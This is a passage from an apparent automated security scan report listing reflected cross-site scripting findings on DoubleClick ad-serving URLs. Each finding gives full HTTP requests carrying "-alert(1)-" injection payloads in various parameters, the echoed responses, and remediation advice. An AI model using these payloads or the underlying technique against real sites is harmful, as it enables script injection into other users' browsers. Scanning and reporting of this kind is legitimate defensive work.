User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7048
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:31:47 GMT
Expires: Mon, 13 Jun 2011 11:31:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=52a5f"-alert(1)-"97ebfb0646bhttp://www.samsclub.com/sams/pagedetails/content.jsp?pageName=fathersDay_2011&pid=VML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9767b"-alert(1)-"c087c4f6224 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE9767b"-alert(1)-"c087c4f6224&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
H3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE9767b"-alert(1)-"c087c4f6224&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fs
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33607"-alert(1)-"8c4e642dafd was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-749415602701834233607"-alert(1)-"8c4e642dafd&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:45 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-749415602701834233607"-alert(1)-"8c4e642dafd&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195c6"-alert(1)-"651f8671dd0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1195c6"-alert(1)-"651f8671dd0&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1195c6"-alert(1)-"651f8671dd0&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl =
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0be"-alert(1)-"9c6f6bd22dd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQbf0be"-alert(1)-"9c6f6bd22dd&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:35 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQbf0be"-alert(1)-"9c6f6bd22dd&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19d1b"-alert(1)-"fc80ffc9911 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L19d1b"-alert(1)-"fc80ffc9911&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/18e/%2a/r%3B242168639%3B0-0%3B0%3B64929701%3B4307-300/250%3B42471810/42489597/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L19d1b"-alert(1)-"fc80ffc9911&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIF
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17d8f'-alert(1)-'1694ab6b6d6 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=1812104017d8f'-alert(1)-'1694ab6b6d6&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4886
Date: Mon, 13 Jun 2011 11:03:07 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
10hairy_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=1812104017d8f'-alert(1)-'1694ab6b6d6&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dhairyguy%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79164'-alert(1)-'4c19bc69a73 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=1812363679164'-alert(1)-'4c19bc69a73&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4869
Date: Mon, 13 Jun 2011 11:03:26 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
g';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=1812363679164'-alert(1)-'4c19bc69a73&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dreach%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%
...[SNIP]...

4.19. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e42d1'-alert(1)-'93e759a580b was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787e42d1'-alert(1)-'93e759a580b&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
